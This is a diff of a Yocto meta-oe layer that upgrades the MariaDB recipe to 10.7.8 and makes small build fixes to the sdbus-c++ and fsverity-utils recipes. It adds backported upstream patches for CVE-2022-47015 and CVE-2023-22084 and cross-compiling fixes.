-PTEST_PATH = "${libdir}/${BPN}/tests" +PTEST_PATH = "${libdir}/${BPN}/ptest" +do_install_ptest() { + install -d ${D}${PTEST_PATH} + cp -r ${B}/tests/sdbus-c++-unit-tests ${D}${PTEST_PATH} +} + FILES:${PN}-ptest =+ "${sysconfdir}/dbus-1/system.d/" FILES:${PN}-dev += "${bindir}/sdbus-c++-xml2cpp" diff --git a/meta-oe/recipes-crypto/fsverity-utils/fsverity-utils_1.5.bb b/meta-oe/recipes-crypto/fsverity-utils/fsverity-utils_1.5.bb index c95a5b2d32..1c2c6e21e0 100644 --- a/meta-oe/recipes-crypto/fsverity-utils/fsverity-utils_1.5.bb +++ b/meta-oe/recipes-crypto/fsverity-utils/fsverity-utils_1.5.bb @@ -16,7 +16,7 @@ S = "${WORKDIR}/git" DEPENDS = "openssl" -EXTRA_OEMAKE:append = "PREFIX=${prefix} LIBDIR=${libdir} USE_SHARED_LIB=1" +EXTRA_OEMAKE:append = " PREFIX=${prefix} LIBDIR=${libdir} USE_SHARED_LIB=1" # We want to statically link the binary to libfsverity on native Windows EXTRA_OEMAKE:remove:mingw32:class-nativesdk = "USE_SHARED_LIB=1" EXTRA_OEMAKE:remove:mingw32:class-native = "USE_SHARED_LIB=1" diff --git a/meta-oe/recipes-dbs/mysql/mariadb-native_10.7.4.bb b/meta-oe/recipes-dbs/mysql/mariadb-native_10.7.8.bb index e38726d3f9..17a06349b0 100644 --- a/meta-oe/recipes-dbs/mysql/mariadb-native_10.7.4.bb +++ b/meta-oe/recipes-dbs/mysql/mariadb-native_10.7.8.bb @@ -2,7 +2,9 @@ require mariadb.inc inherit native PROVIDES += "mysql5-native" -DEPENDS = "ncurses-native zlib-native bison-native libpcre2-native" +DEPENDS = "ncurses-native zlib-native bison-native libpcre2-native \ +gnutls-native fmt-native \ +" RDEPENDS:${PN} = "" PACKAGES = "" diff --git a/meta-oe/recipes-dbs/mysql/mariadb.inc b/meta-oe/recipes-dbs/mysql/mariadb.inc index 922373b633..7c4b0a467f 100644 --- a/meta-oe/recipes-dbs/mysql/mariadb.inc +++ b/meta-oe/recipes-dbs/mysql/mariadb.inc @@ -19,11 +19,14 @@ SRC_URI = "https://archive.mariadb.org/${BP}/source/${BP}.tar.gz \ file://ssize_t.patch \ file://mm_malloc.patch \ file://sys_futex.patch \ - file://mariadb-openssl3.patch \ + file://cross-compiling.patch \ + file://0001-sql-CMakeLists.txt-fix-gen_lex_hash-not-found.patch \ + file://0001-MDEV-29644-a-potential-bug-of-null-pointer-dereferen.patch \ + file://CVE-2023-22084.patch \ " SRC_URI:append:libc-musl = " file://ppc-remove-glibc-dep.patch" -SRC_URI[sha256sum] = "73dd9c9d325520f20ca5e0ef16f94b7be1146bed7e4a78e735c20daebf3a4173" +SRC_URI[sha256sum] = "f8c69d9080d85eafb3e3a84837bfa566a7f5527a8af6f9a081429d4de0de4778" UPSTREAM_CHECK_URI = "https://github.com/MariaDB/server/releases" @@ -61,6 +64,8 @@ FILES:${PN}-setupdb = "${sysconfdir}/init.d/install_db \ ${bindir}/mysql-systemd-start \ " +EXTRA_OEMAKE = "'GEN_LEX_HASH=${STAGING_BINDIR_NATIVE}/gen_lex_hash'" + PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'pam', d)} openssl" PACKAGECONFIG:class-native = "" PACKAGECONFIG[pam] = ",-DWITHOUT_AUTH_PAM=TRUE,libpam" @@ -95,9 +100,9 @@ EXTRA_OECMAKE = "-DWITH_EMBEDDED_SERVER=ON \ -DINSTALL_SYSCONFDIR:PATH=${sysconfdir} \ -DMYSQL_DATADIR:PATH=/var/mysql \ -DCAT_EXECUTABLE=`which cat` \ + -DSTACK_DIRECTION=1 \ -DCMAKE_AR:FILEPATH=${AR}" -EXTRA_OECMAKE:prepend:class-target = "-DCMAKE_CROSSCOMPILING_EMULATOR=${WORKDIR}/qemuwrapper " # With Ninja it fails with: # make: *** No rule to make target `install'. Stop. @@ -121,18 +126,12 @@ do_generate_toolchain_file:append:class-native () { sed -i "/set( CMAKE_SYSTEM_PROCESSOR/d" ${WORKDIR}/toolchain.cmake } -do_configure:prepend:class-target () { - # Write out a qemu wrapper that will be used by cmake - # so that it can run target helper binaries through that. - qemu_binary="${@qemu_wrapper_cmdline(d, d.getVar('STAGING_DIR_HOST'), [d.expand('${STAGING_DIR_HOST}${libdir}'),d.expand('${STAGING_DIR_HOST}${base_libdir}')])}" - cat > ${WORKDIR}/qemuwrapper << EOF -#!/bin/sh -$qemu_binary "\$@" -EOF - chmod +x ${WORKDIR}/qemuwrapper -} do_compile:prepend:class-target () { + # These need to be in-tree or make will think they need to be built, + # and since we're cross-compiling that is disabled + cp ${STAGING_BINDIR_NATIVE}/comp_err ${S}/extra + cp ${STAGING_BINDIR_NATIVE}/comp_sql ${S}/scripts if [ "${@bb.utils.contains('PACKAGECONFIG', 'krb5', 'yes', 'no', d)}" = "no" ]; then if ! [ -e ${B}/include/openssl/kssl.h ] ; then mkdir -p ${B}/include/openssl diff --git a/meta-oe/recipes-dbs/mysql/mariadb/0001-MDEV-29644-a-potential-bug-of-null-pointer-dereferen.patch b/meta-oe/recipes-dbs/mysql/mariadb/0001-MDEV-29644-a-potential-bug-of-null-pointer-dereferen.patch new file mode 100644 index 0000000000..2fe768d754 --- /dev/null +++ b/meta-oe/recipes-dbs/mysql/mariadb/0001-MDEV-29644-a-potential-bug-of-null-pointer-dereferen.patch @@ -0,0 +1,320 @@ +From b98375f9df0b024857c03c03bc3e73e8ced8d772 Mon Sep 17 00:00:00 2001 +From: Nayuta Yanagisawa <nayuta.yanagisawa@hey.com> +Date: Tue, 27 Sep 2022 15:22:57 +0900 +Subject: [PATCH] MDEV-29644 a potential bug of null pointer dereference in + spider_db_mbase::print_warnings() + +The function spider_db_mbase::print_warnings() can potentially result +in a null pointer dereference. + +Remove the null pointer dereference by cleaning up the function. + +Some small changes to the original commit +422fb63a9bbee35c50b6c7be19d199afe0bc98fa. + +CVE: CVE-2022-47015 + +Upstream-Status: Backport [https://github.com/MariaDB/server/commit/b98375f9df0] + +Co-Authored-By: Yuchen Pei <yuchen.pei@mariadb.com> +Signed-off-by: Mingli Yu <mingli.yu@windriver.com> +--- + .../spider/bugfix/r/mdev_29644.result | 41 ++++++ + .../mysql-test/spider/bugfix/t/mdev_29644.cnf | 3 + + .../spider/bugfix/t/mdev_29644.test | 56 ++++++++ + storage/spider/spd_db_mysql.cc | 124 ++++++++---------- + storage/spider/spd_db_mysql.h | 2 +- + 5 files changed, 154 insertions(+), 72 deletions(-) + create mode 100644 storage/spider/mysql-test/spider/bugfix/r/mdev_29644.result + create mode 100644 storage/spider/mysql-test/spider/bugfix/t/mdev_29644.cnf + create mode 100644 storage/spider/mysql-test/spider/bugfix/t/mdev_29644.test + +diff --git a/storage/spider/mysql-test/spider/bugfix/r/mdev_29644.result b/storage/spider/mysql-test/spider/bugfix/r/mdev_29644.result +new file mode 100644 +index 00000000000..b52cecc5bb7 +--- /dev/null ++++ b/storage/spider/mysql-test/spider/bugfix/r/mdev_29644.result +@@ -0,0 +1,41 @@ ++# ++# MDEV-29644 a potential bug of null pointer dereference in spider_db_mbase::print_warnings() ++# ++for master_1 ++for child2 ++child2_1 ++child2_2 ++child2_3 ++for child3 ++connection child2_1; ++CREATE DATABASE auto_test_remote; ++USE auto_test_remote; ++CREATE TABLE tbl_a ( ++a CHAR(5) ++) ENGINE=InnoDB DEFAULT CHARSET=utf8; ++SET GLOBAL sql_mode=''; ++connection master_1; ++CREATE DATABASE auto_test_local; ++USE auto_test_local; ++CREATE TABLE tbl_a ( ++a CHAR(255) ++) ENGINE=Spider DEFAULT CHARSET=utf8 COMMENT='table "tbl_a", srv "s_2_1"'; ++SET sql_mode=''; ++INSERT INTO tbl_a VALUES ("this will be truncated"); ++NOT FOUND /\[WARN SPIDER RESULT\].* Warning 1265 Data truncated for column 'a' at row 1.*/ in mysqld.1.1.err ++SET GLOBAL spider_log_result_errors=4; ++INSERT INTO tbl_a VALUES ("this will be truncated"); ++FOUND 1 /\[WARN SPIDER RESULT\].* Warning 1265 Data truncated for column 'a' at row 1.*/ in mysqld.1.1.err ++connection master_1; ++SET GLOBAL spider_log_result_errors=DEFAULT; ++SET sql_mode=DEFAULT; ++DROP DATABASE IF EXISTS auto_test_local; ++connection child2_1; ++SET GLOBAL sql_mode=DEFAULT; ++DROP DATABASE IF EXISTS auto_test_remote; ++for master_1 ++for child2 ++child2_1 ++child2_2 ++child2_3 ++for child3 +diff --git a/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.cnf b/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.cnf +new file mode 100644 +index 00000000000..05dfd8a0bce +--- /dev/null ++++ b/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.cnf +@@ -0,0 +1,3 @@ ++!include include/default_mysqld.cnf ++!include ../my_1_1.cnf ++!include ../my_2_1.cnf +diff --git a/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.test b/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.test +new file mode 100644 +index 00000000000..3a8fbb251e1 +--- /dev/null ++++ b/storage/spider/mysql-test/spider/bugfix/t/mdev_29644.test +@@ -0,0 +1,56 @@ ++--echo # ++--echo # MDEV-29644 a potential bug of null pointer dereference in spider_db_mbase::print_warnings() ++--echo # ++ ++# The test case below does not cause the potential null pointer dereference. ++# It is just for checking spider_db_mbase::fetch_and_print_warnings() works. ++ ++--disable_query_log ++--disable_result_log ++--source ../../t/test_init.inc ++--enable_result_log ++--enable_query_log ++ ++--connection child2_1 ++CREATE DATABASE auto_test_remote; ++USE auto_test_remote; ++eval CREATE TABLE tbl_a ( ++ a CHAR(5) ++) $CHILD2_1_ENGINE $CHILD2_1_CHARSET; ++ ++SET GLOBAL sql_mode=''; ++ ++--connection master_1 ++CREATE DATABASE auto_test_local; ++USE auto_test_local; ++eval CREATE TABLE tbl_a ( ++ a CHAR(255) ++) $MASTER_1_ENGINE $MASTER_1_CHARSET COMMENT='table "tbl_a", srv "s_2_1"'; ++ ++SET sql_mode=''; ++ ++let SEARCH_FILE= $MYSQLTEST_VARDIR/log/mysqld.1.1.err; ++let SEARCH_PATTERN= \[WARN SPIDER RESULT\].* Warning 1265 Data truncated for column 'a' at row 1.*; ++ ++INSERT INTO tbl_a VALUES ("this will be truncated"); ++--source include/search_pattern_in_file.inc # should not find ++ ++SET GLOBAL spider_log_result_errors=4; ++ ++INSERT INTO tbl_a VALUES ("this will be truncated"); ++--source include/search_pattern_in_file.inc # should find ++ ++--connection master_1 ++SET GLOBAL spider_log_result_errors=DEFAULT; ++SET sql_mode=DEFAULT; ++DROP DATABASE IF EXISTS auto_test_local; ++ ++--connection child2_1 ++SET GLOBAL sql_mode=DEFAULT; ++DROP DATABASE IF EXISTS auto_test_remote; ++ ++--disable_query_log ++--disable_result_log ++--source ../t/test_deinit.inc ++--enable_query_log ++--enable_result_log +diff --git a/storage/spider/spd_db_mysql.cc b/storage/spider/spd_db_mysql.cc +index d377d2bd807..bc8383017f7 100644 +--- a/storage/spider/spd_db_mysql.cc ++++ b/storage/spider/spd_db_mysql.cc +@@ -2207,7 +2207,7 @@ int spider_db_mbase::exec_query( + db_conn->affected_rows, db_conn->insert_id, + db_conn->server_status, db_conn->warning_count); + if (spider_param_log_result_errors() >= 3) +- print_warnings(l_time); ++ fetch_and_print_warnings(l_time); + } else if (log_result_errors >= 4) + { + time_t cur_time = (time_t) time((time_t*) 0); +@@ -2289,81 +2289,63 @@ bool spider_db_mbase::is_xa_nota_error( + DBUG_RETURN(xa_nota); + } + +-int spider_db_mbase::print_warnings( +- struct tm *l_time +-) { ++int spider_db_mbase::fetch_and_print_warnings(struct tm *l_time) ++{ + int error_num = 0; +- DBUG_ENTER("spider_db_mbase::print_warnings"); ++ DBUG_ENTER("spider_db_mbase::fetch_and_print_warnings"); + DBUG_PRINT("info",("spider this=%p", this)); +- if (db_conn->status == MYSQL_STATUS_READY) ++ ++ if (spider_param_dry_access() || db_conn->status != MYSQL_STATUS_READY || ++ db_conn->server_status & SERVER_MORE_RESULTS_EXISTS || ++ !db_conn->warning_count) ++ DBUG_RETURN(0); ++ ++ if (mysql_real_query(db_conn, SPIDER_SQL_SHOW_WARNINGS_STR, ++ SPIDER_SQL_SHOW_WARNINGS_LEN)) ++ DBUG_RETURN(0); ++ ++ MYSQL_RES *res= mysql_store_result(db_conn); ++ if (!res) ++ DBUG_RETURN(0); ++ ++ uint num_fields= mysql_num_fields(res); ++ if (num_fields != 3) + { +- if ( +-#if MYSQL_VERSION_ID < 50500 +- !(db_conn->last_used_con->server_status & SERVER_MORE_RESULTS_EXISTS) && +- db_conn->last_used_con->warning_count +-#else +- !(db_conn->server_status & SERVER_MORE_RESULTS_EXISTS) && +- db_conn->warning_count +-#endif +- ) { +- if ( +- spider_param_dry_access() || +- !mysql_real_query(db_conn, SPIDER_SQL_SHOW_WARNINGS_STR, +- SPIDER_SQL_SHOW_WARNINGS_LEN) +- ) { +- MYSQL_RES *res = NULL; +- MYSQL_ROW row = NULL; +- uint num_fields; +- if ( +- spider_param_dry_access() || +- !(res = mysql_store_result(db_conn)) || +- !(row = mysql_fetch_row(res)) +- ) { +- if (mysql_errno(db_conn)) +- { +- if (res) +- mysql_free_result(res); +- DBUG_RETURN(0); +- } +- /* no record is ok */ +- } +- num_fields = mysql_num_fields(res); +- if (num_fields != 3) +- { +- mysql_free_result(res); +- DBUG_RETURN(0); +- } +- if (l_time) +- { +- while (row) +- { +- fprintf(stderr, "%04d%02d%02d %02d:%02d:%02d [WARN SPIDER RESULT] " +- "from [%s] %ld to %ld: %s %s %s\n", ++ mysql_free_result(res); ++ DBUG_RETURN(0); ++ } ++ ++ MYSQL_ROW row= mysql_fetch_row(res); ++ if (l_time) ++ { ++ while (row) ++ { ++ fprintf(stderr, ++ "%04d%02d%02d %02d:%02d:%02d [WARN SPIDER RESULT] from [%s] %ld " ++ "to %ld: %s %s %s\n", + l_time->tm_year + 1900, l_time->tm_mon + 1, l_time->tm_mday, +- l_time->tm_hour, l_time->tm_min, l_time->tm_sec, +- conn->tgt_host, (ulong) db_conn->thread_id, +- (ulong) current_thd->thread_id, row[0], row[1], row[2]); +- row = mysql_fetch_row(res); +- } +- } else { +- while (row) +- { +- DBUG_PRINT("info",("spider row[0]=%s", row[0])); +- DBUG_PRINT("info",("spider row[1]=%s", row[1])); +- DBUG_PRINT("info",("spider row[2]=%s", row[2])); +- longlong res_num = +- (longlong) my_strtoll10(row[1], (char**) NULL, &error_num); +- DBUG_PRINT("info",("spider res_num=%lld", res_num)); +- my_printf_error((int) res_num, row[2], MYF(0)); +- error_num = (int) res_num; +- row = mysql_fetch_row(res); +- } +- } +- if (res) +- mysql_free_result(res); +- } ++ l_time->tm_hour, l_time->tm_min, l_time->tm_sec, conn->tgt_host, ++ (ulong) db_conn->thread_id, (ulong) current_thd->thread_id, row[0], ++ row[1], row[2]); ++ row= mysql_fetch_row(res); ++ } ++ } else { ++ while (row) ++ { ++ DBUG_PRINT("info",("spider row[0]=%s", row[0])); ++ DBUG_PRINT("info",("spider row[1]=%s", row[1])); ++ DBUG_PRINT("info",("spider row[2]=%s", row[2])); ++ longlong res_num = ++ (longlong) my_strtoll10(row[1], (char**) NULL, &error_num); ++ DBUG_PRINT("info",("spider res_num=%lld", res_num)); ++ my_printf_error((int) res_num, row[2], MYF(0)); ++ error_num = (int) res_num; ++ row = mysql_fetch_row(res); + } + } ++ ++ mysql_free_result(res); ++ + DBUG_RETURN(error_num); + } + +@@ -14668,7 +14650,7 @@ int spider_mbase_handler::show_table_status( + DBUG_RETURN(error_num); + } + } +- if ((error_num = ((spider_db_mbase *) conn->db_conn)->print_warnings(NULL))) ++ if ((error_num = ((spider_db_mbase *) conn->db_conn)->fetch_and_print_warnings(NULL))) + { + DBUG_RETURN(error_num); + } +diff --git a/storage/spider/spd_db_mysql.h b/storage/spider/spd_db_mysql.h +index e90461ea278..a2012352f21 100644 +--- a/storage/spider/spd_db_mysql.h ++++ b/storage/spider/spd_db_mysql.h +@@ -442,7 +442,7 @@ class spider_db_mbase: public spider_db_conn + bool is_xa_nota_error( + int error_num + ); +- int print_warnings( ++ int fetch_and_print_warnings( + struct tm *l_time + ); + spider_db_result *store_result( +-- +2.25.1 + diff --git a/meta-oe/recipes-dbs/mysql/mariadb/0001-sql-CMakeLists.txt-fix-gen_lex_hash-not-found.patch b/meta-oe/recipes-dbs/mysql/mariadb/0001-sql-CMakeLists.txt-fix-gen_lex_hash-not-found.patch new file mode 100644 index 0000000000..456a2bad64 --- /dev/null +++ b/meta-oe/recipes-dbs/mysql/mariadb/0001-sql-CMakeLists.txt-fix-gen_lex_hash-not-found.patch @@ -0,0 +1,69 @@ +From f92f657973997df30afdb0032c88ad3a14ead46b Mon Sep 17 00:00:00 2001 +From: Mingli Yu <mingli.yu@windriver.com> +Date: Fri, 23 Sep 2022 15:48:21 +0800 +Subject: [PATCH] sql/CMakeLists.txt: fix gen_lex_hash not found + +Fix the below do_compile issue in cross-compiling env. +| make[2]: *** No rule to make target '/build/tmp/work/aarch64-poky-linux/mariadb/10.3.13-r0/mariadb-10.3.13/sql/gen_lex_hash', needed by 'sql/lex_hash.h'. Stop. +| make[2]: *** No rule to make target '/build/tmp/work/aarch64-poky-linux/mariadb/10.3.13-r0/mariadb-10.3.13/sql/gen_lex_token', needed by 'sql/lex_token.h'. Stop. + +Upstream-Status: Inappropriate [oe build specific] + +Signed-off-by: Mingli Yu <mingli.yu@windriver.com> +--- + sql/CMakeLists.txt | 30 ++++++++++++++++++++++-------- + 1 file changed, 22 insertions(+), 8 deletions(-) + +diff --git a/sql/CMakeLists.txt b/sql/CMakeLists.txt +index 241b482..27a3991 100644 +--- a/sql/CMakeLists.txt ++++ b/sql/CMakeLists.txt +@@ -60,11 +60,18 @@ ${CMAKE_BINARY_DIR}/sql + ${CMAKE_SOURCE_DIR}/tpool + ) + +-ADD_CUSTOM_COMMAND( +- OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_token.h +- COMMAND gen_lex_token > lex_token.h +- DEPENDS gen_lex_token ++IF(NOT CMAKE_CROSSCOMPILING) ++ ADD_CUSTOM_COMMAND( ++ OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_token.h ++ COMMAND gen_lex_token > lex_token.h ++ DEPENDS gen_lex_token ++) ++ELSE() ++ ADD_CUSTOM_COMMAND( ++ OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_token.h ++ COMMAND gen_lex_token > lex_token.h + ) ++ENDIF() + + FIND_PACKAGE(BISON 2.4) + +@@ -372,11 +379,18 @@ IF(NOT CMAKE_CROSSCOMPILING OR DEFINED CMAKE_CROSSCOMPILING_EMULATOR) + ADD_EXECUTABLE(gen_lex_hash gen_lex_hash.cc) + ENDIF() + +-ADD_CUSTOM_COMMAND( +- OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_hash.h +- COMMAND gen_lex_hash > lex_hash.h +- DEPENDS gen_lex_hash ++IF(NOT CMAKE_CROSSCOMPILING) ++ ADD_CUSTOM_COMMAND( ++ OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_hash.h ++ COMMAND gen_lex_hash > lex_hash.h ++ DEPENDS gen_lex_hash ++) ++ELSE() ++ ADD_CUSTOM_COMMAND( ++ OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/lex_hash.h ++ COMMAND gen_lex_hash > lex_hash.h + ) ++ENDIF() + + MYSQL_ADD_EXECUTABLE(mariadb-tzinfo-to-sql tztime.cc) + SET_TARGET_PROPERTIES(mariadb-tzinfo-to-sql PROPERTIES COMPILE_FLAGS "-DTZINFO2SQL") +-- +2.25.1 + diff --git a/meta-oe/recipes-dbs/mysql/mariadb/CVE-2023-22084.patch b/meta-oe/recipes-dbs/mysql/mariadb/CVE-2023-22084.patch new file mode 100644 index 0000000000..3053614854 --- /dev/null +++ b/meta-oe/recipes-dbs/mysql/mariadb/CVE-2023-22084.patch @@ -0,0 +1,91 @@ +From 15ae97b1c2c14f1263cdc853673c4129625323de Mon Sep 17 00:00:00 2001 +From: Marko Mäkelä <marko.makela@mariadb.com> +Date: Thu, 8 Feb 2024 08:09:20 +0000 +Subject: [PATCH] MDEV-32578 row_merge_fts_doc_tokenize() handles parser plugin + inconsistently + +When mysql/mysql-server@0c954c2 +added a plugin interface for FULLTEXT INDEX tokenization to MySQL 5.7, +fts_tokenize_ctx::processed_len got a second meaning, which is only +partly implemented in row_merge_fts_doc_tokenize(). + +This inconsistency could cause a crash when using FULLTEXT...WITH PARSER. +A test case that would crash MySQL 8.0 when using an n-gram parser and +single-character words would fail to crash in MySQL 5.7, because the +buf_full condition in row_merge_fts_doc_tokenize() was not met. + +This change is inspired by +mysql/mysql-server@38e9a07 +that appeared in MySQL 5.7.44. + +CVE: CVE-2023-22084 +Upstream-Status: Backport [https://github.com/MariaDB/server/commit/15ae97b1c2c1] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + storage/innobase/include/row0ftsort.h | 6 +++++- + storage/innobase/row/row0ftsort.cc | 11 ++++++++--- + 2 files changed, 13 insertions(+), 4 deletions(-) + +diff --git a/storage/innobase/include/row0ftsort.h b/storage/innobase/include/row0ftsort.h +index 65508caf..3ffa8243 100644 +--- a/storage/innobase/include/row0ftsort.h ++++ b/storage/innobase/include/row0ftsort.h +@@ -104,7 +104,10 @@ typedef UT_LIST_BASE_NODE_T(row_fts_token_t) fts_token_list_t; + + /** Structure stores information from string tokenization operation */ + struct fts_tokenize_ctx { +- ulint processed_len; /*!< processed string length */ ++ /** the processed string length in bytes ++ (when using the built-in tokenizer), ++ or the number of row_merge_fts_doc_tokenize_by_parser() calls */ ++ ulint processed_len; + ulint init_pos; /*!< doc start position */ + ulint buf_used; /*!< the sort buffer (ID) when + tokenization stops, which +@@ -115,6 +118,7 @@ struct fts_tokenize_ctx { + ib_rbt_t* cached_stopword;/*!< in: stopword list */ + dfield_t sort_field[FTS_NUM_FIELDS_SORT]; + /*!< in: sort field */ ++ /** parsed tokens (when using an external parser) */ + fts_token_list_t fts_token_list; + + fts_tokenize_ctx() : +diff --git a/storage/innobase/row/row0ftsort.cc b/storage/innobase/row/row0ftsort.cc +index 86e96624..406ff60f 100644 +--- a/storage/innobase/row/row0ftsort.cc ++++ b/storage/innobase/row/row0ftsort.cc +@@ -491,7 +491,10 @@ row_merge_fts_doc_tokenize( + + /* Tokenize the data and add each word string, its corresponding + doc id and position to sort buffer */ +- while (t_ctx->processed_len < doc->text.f_len) { ++ while (parser ++ ? (!t_ctx->processed_len ++ || UT_LIST_GET_LEN(t_ctx->fts_token_list)) ++ : t_ctx->processed_len < doc->text.f_len) { + ulint idx = 0; + ulint cur_len; + doc_id_t write_doc_id; +@@ -831,7 +834,8 @@ void fts_parallel_tokenization( + /* Not yet finish processing the "doc" on hand, + continue processing it */ + ut_ad(doc.text.f_str); +- ut_ad(t_ctx.processed_len < doc.text.f_len); ++ ut_ad(buf[0]->index->parser ++ || t_ctx.processed_len < doc.text.f_len); + } + + processed = row_merge_fts_doc_tokenize( +@@ -841,7 +845,8 @@ void fts_parallel_tokenization( + + /* Current sort buffer full, need to recycle */ + if (!processed) { +- ut_ad(t_ctx.processed_len < doc.text.f_len); ++ ut_ad(buf[0]->index->parser ++ || t_ctx.processed_len < doc.text.f_len); + ut_ad(t_ctx.rows_added[t_ctx.buf_used]); + break; + } +-- +2.40.0 diff --git a/meta-oe/recipes-dbs/mysql/mariadb/cross-compiling.patch b/meta-oe/recipes-dbs/mysql/mariadb/cross-compiling.patch new file mode 100644 index 0000000000..d0d6e3c730 --- /dev/null +++ b/meta-oe/recipes-dbs/mysql/mariadb/cross-compiling.patch @@ -0,0 +1,34 @@ +From 80be37351d995654f86b838f6b5ed47e8a90261b Mon Sep 17 00:00:00 2001 +From: Mingli Yu <mingli.yu@windriver.com> +Date: Fri, 23 Sep 2022 12:05:17 +0800 +Subject: [PATCH] CMakeLists.txt: not include import_executables.cmake + +building failed since native does not generate import_executables.cmake +In fact, our building system will export the needed commands. + +Upstream-Status: Inappropriate [oe specific] + +Signed-off-by: Mingli Yu <mingli.yu@windriver.com> +--- + CMakeLists.txt | 5 ----- + 1 file changed, 5 deletions(-) + +diff --git a/CMakeLists.txt b/CMakeLists.txt +index f9e2b1b..34924ba 100644 +--- a/CMakeLists.txt ++++ b/CMakeLists.txt +@@ -394,11 +394,6 @@ CHECK_LIBFMT() + ADD_SUBDIRECTORY(tpool) + CHECK_SYSTEMD() + +-IF(CMAKE_CROSSCOMPILING AND NOT DEFINED CMAKE_CROSSCOMPILING_EMULATOR) +- SET(IMPORT_EXECUTABLES "IMPORTFILE-NOTFOUND" CACHE FILEPATH "Path to import_executables.cmake from a native build") +- INCLUDE(${IMPORT_EXECUTABLES}) +-ENDIF() +- + # + # Setup maintainer mode options. Platform checks are + # not run with the warning options as to not perturb fragile checks +-- +2.25.1 + diff --git a/meta-oe/recipes-dbs/mysql/mariadb/mariadb-openssl3.patch b/meta-oe/recipes-dbs/mysql/mariadb/mariadb-openssl3.patch deleted file mode 100644 index 878675f30d..0000000000 --- a/meta-oe/recipes-dbs/mysql/mariadb/mariadb-openssl3.patch +++ /dev/null @@ -1,416 +0,0 @@ -From 1626955f3a2107ec4c7fd927ebfa3c6c1d2b09b8 Mon Sep 17 00:00:00 2001 -From: Vladislav Vaintroub <wlad@mariadb.com> -Date: Mon, 8 Nov 2021 18:48:19 +0100 -Subject: [PATCH] MDEV-25785 Add support for OpenSSL 3.0 - -Summary of changes - -- MD_CTX_SIZE is increased - -- EVP_CIPHER_CTX_buf_noconst(ctx) does not work anymore, points - to nobody knows where. The assumption made previously was that - (since the function does not seem to be documented) - was that it points to the last partial source block. - Add own partial block buffer for NOPAD encryption instead - -- SECLEVEL in CipherString in openssl.cnf - had been downgraded to 0, from 1, to make TLSv1.0 and TLSv1.1 possible - -- Workaround Ssl_cipher_list issue, it now returns TLSv1.3 ciphers, - in addition to what was set in --ssl-cipher - -- ctx_buf buffer now must be aligned to 16 bytes with openssl( - previously with WolfSSL only), ot crashes will happen - -- updated aes-t , to be better debuggable - using function, rather than a huge multiline macro - added test that does "nopad" encryption piece-wise, to test - replacement of EVP_CIPHER_CTX_buf_noconst - -Patch from Fedora https://src.fedoraproject.org/rpms/mariadb/raw/rawhide/f/mariadb-openssl3.patch - -Upstream-Status: Backport [https://github.com/MariaDB/server/commit/d42c2efbaa06a0307c2f0fd8fa87819ff50bbd7e] -Signed-off-by: Khem Raj <raj.khem@gmail.com> -Signed-off-by: Mingli Yu <mingli.yu@windriver.com> ---- - cmake/ssl.cmake | 21 +++++- - include/mysql/service_my_crypt.h | 2 +- - include/ssl_compat.h | 3 +- - mysql-test/lib/openssl.cnf | 2 +- - mysql-test/main/ssl_cipher.result | 6 +- - mysql-test/main/ssl_cipher.test | 2 +- - mysys_ssl/my_crypt.cc | 46 +++++++----- - unittest/mysys/aes-t.c | 121 ++++++++++++++++++++++-------- - 8 files changed, 143 insertions(+), 60 deletions(-) - -diff --git a/cmake/ssl.cmake b/cmake/ssl.cmake -index a6793cf3..64c93ff9 100644 ---- a/cmake/ssl.cmake -+++ b/cmake/ssl.cmake -@@ -118,7 +118,7 @@ MACRO (MYSQL_CHECK_SSL) - ENDIF() - FIND_PACKAGE(OpenSSL) - SET_PACKAGE_PROPERTIES(OpenSSL PROPERTIES TYPE RECOMMENDED) -- IF(OPENSSL_FOUND AND OPENSSL_VERSION AND OPENSSL_VERSION VERSION_LESS "3.0.0") -+ IF(OPENSSL_FOUND) - SET(OPENSSL_LIBRARY ${OPENSSL_SSL_LIBRARY}) - INCLUDE(CheckSymbolExists) - SET(SSL_SOURCES "") -@@ -139,9 +139,20 @@ MACRO (MYSQL_CHECK_SSL) - SET(SSL_INTERNAL_INCLUDE_DIRS "") - SET(SSL_DEFINES "-DHAVE_OPENSSL") - -+ FOREACH(x INCLUDES LIBRARIES DEFINITIONS) -+ SET(SAVE_CMAKE_REQUIRED_${x} ${CMAKE_REQUIRED_${x}}) -+ ENDFOREACH() -+ -+ # Silence "deprecated in OpenSSL 3.0" -+ IF((NOT OPENSSL_VERSION) # 3.0 not determined by older cmake -+ OR NOT(OPENSSL_VERSION VERSION_LESS "3.0.0")) -+ SET(SSL_DEFINES "${SSL_DEFINES} -DOPENSSL_API_COMPAT=0x10100000L") -+ SET(CMAKE_REQUIRED_DEFINITIONS -DOPENSSL_API_COMPAT=0x10100000L) -+ ENDIF() -+ - SET(CMAKE_REQUIRED_INCLUDES ${OPENSSL_INCLUDE_DIR}) - SET(CMAKE_REQUIRED_LIBRARIES ${SSL_LIBRARIES}) -- SET(CMAKE_REQUIRED_INCLUDES ${OPENSSL_INCLUDE_DIR}) -+ - CHECK_SYMBOL_EXISTS(ERR_remove_thread_state "openssl/err.h" - HAVE_ERR_remove_thread_state) - CHECK_SYMBOL_EXISTS(EVP_aes_128_ctr "openssl/evp.h" -@@ -150,8 +161,10 @@ MACRO (MYSQL_CHECK_SSL) - HAVE_EncryptAes128Gcm) - CHECK_SYMBOL_EXISTS(X509_check_host "openssl/x509v3.h" - HAVE_X509_check_host) -- SET(CMAKE_REQUIRED_INCLUDES) -- SET(CMAKE_REQUIRED_LIBRARIES) -+ -+ FOREACH(x INCLUDES LIBRARIES DEFINITIONS) -+ SET(CMAKE_REQUIRED_${x} ${SAVE_CMAKE_REQUIRED_${x}}) -+ ENDFOREACH() - ELSE() - IF(WITH_SSL STREQUAL "system") - MESSAGE(FATAL_ERROR "Cannot find appropriate system libraries for SSL. Use WITH_SSL=bundled to enable SSL support") -diff --git 